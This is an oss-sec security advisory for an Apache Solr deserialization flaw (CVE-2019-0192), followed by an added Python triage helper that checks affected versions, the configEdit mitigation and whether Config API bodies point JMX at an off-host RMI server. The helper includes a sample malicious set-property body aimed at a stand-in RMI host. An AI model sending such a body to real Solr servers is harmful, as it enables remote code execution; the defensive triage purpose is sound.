oss-sec mailing list archives
CVE-2019-0192 Deserialization of untrusted data via jmx.serviceUrl in Apache Solr
From: Tomas Fernandez Lobbe <tflobbe () apache org>
Date: Wed, 6 Mar 2019 22:41:37 -0800
Severity: High

Vendor: The Apache Software Foundation

Versions Affected:
5.0.0 to 5.5.5
6.0.0 to 6.6.5

Description:
The ConfigAPI allows Solr's JMX server to be configured via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

Mitigation: Any of the following is enough to prevent this vulnerability:
* Upgrade to Apache Solr 7.0 or later.
* Disable the ConfigAPI if not in use, by running Solr with the system property "disable.configEdit=true".
* If upgrading or disabling the Config API are not viable options, apply the patch in [1] and re-compile Solr.
* Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr.

Credit: Michael Stepankin

References:
[1] https://issues.apache.org/jira/browse/SOLR-13301
[2] https://wiki.apache.org/solr/SolrSecurity
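The following is an added triage helper, not code from the advisory or from the Solr project. It encodes the three facts a responder needs from the advisory: the inclusive affected version ranges, whether the node runs with the "disable.configEdit=true" mitigation, and whether a Config API request body would point jmx.serviceUrl at an RMI registry on another host. The request shape ({"set-property": {...}}) is assumed from the documented Config API; the property name comes from the advisory title; the sample body and IP address are constructed for illustration.

```python
"""Triage helpers for CVE-2019-0192 exposure (added example, not Solr code)."""
import json
import re
from typing import Dict, List, Optional, Tuple

# Affected ranges as stated in the advisory, inclusive on both ends.
AFFECTED_RANGES = [((5, 0, 0), (5, 5, 5)), ((6, 0, 0), (6, 6, 5))]
LOOPBACK = {"localhost", "127.0.0.1", "::1"}

# Constructed sample Config API body: a JMX service URL whose RMI registry
# lives on an attacker-controlled host (TEST-NET address, not a real target).
MALICIOUS_BODY = json.dumps({
    "set-property": {
        "jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://203.0.113.5:1099/jmxrmi"
    }
})


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '6.6.5' or '6.6.5-SNAPSHOT' into (6, 6, 5); missing parts become 0."""
    core = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not core:
        raise ValueError(f"unrecognised Solr version: {version!r}")
    parts = [int(p) for p in core.group(0).split(".")]
    parts = (parts + [0, 0, 0])[:3]
    return parts[0], parts[1], parts[2]


def is_affected_version(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def config_edit_disabled(system_props: Dict[str, str]) -> bool:
    """True when the node was started with the advisory's mitigating property."""
    return system_props.get("disable.configEdit", "").strip().lower() == "true"


def jmx_edits(body: str) -> List[Tuple[str, str]]:
    """Return (property, value) pairs a Config API POST would apply to jmx.* properties.

    Assumes the documented {"set-property": {name: value}} command shape; anything
    that is not a JSON object, or has no set-property command, yields no edits."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(doc, dict):
        return []
    props = doc.get("set-property")
    if not isinstance(props, dict):
        return []
    return [(str(n), str(v)) for n, v in props.items() if str(n).startswith("jmx.")]


def rmi_host(service_url: str) -> Optional[str]:
    """Extract the RMI registry host from a JMX service URL.

    Handles both 'service:jmx:rmi:///jndi/rmi://host:port/...' (the empty
    authority after the first rmi:// is skipped) and 'service:jmx:rmi://host:port/...'.
    Returns None when the value is not an RMI URL at all."""
    m = re.search(r"rmi://(?!/)(\[[^\]]+\]|[^:/\s]+)", service_url)
    if not m:
        return None
    return m.group(1).strip("[]")


def assess(version: str, system_props: Dict[str, str], body: str) -> Dict[str, object]:
    """Combine the three checks into one verdict for a node and a request body."""
    edits = jmx_edits(body)
    remote = []
    for _name, value in edits:
        host = rmi_host(value)
        if host and host not in LOOPBACK:
            remote.append(host)
    affected = is_affected_version(version)
    disabled = config_edit_disabled(system_props)
    return {
        "affected_version": affected,
        "config_edit_disabled": disabled,
        "jmx_edits": edits,
        "remote_rmi_hosts": remote,
        # The advisory's path: vulnerable build, editable config, JMX pointed off-host.
        "at_risk": affected and not disabled and bool(remote),
    }


if __name__ == "__main__":
    print(assess("6.6.5", {}, MALICIOUS_BODY))
    print(assess("6.6.5", {"disable.configEdit": "true"}, MALICIOUS_BODY))
    print(assess("7.0.0", {}, MALICIOUS_BODY))
```

The version string can be taken from the Solr admin UI or the release you deployed, the system properties from the JVM command line of the running node, and the body from a proxy or WAF that sees POSTs to a core's /config endpoint; a loopback RMI host is deliberately not flagged, since only an off-host registry matches the "malicious RMI server" the advisory describes.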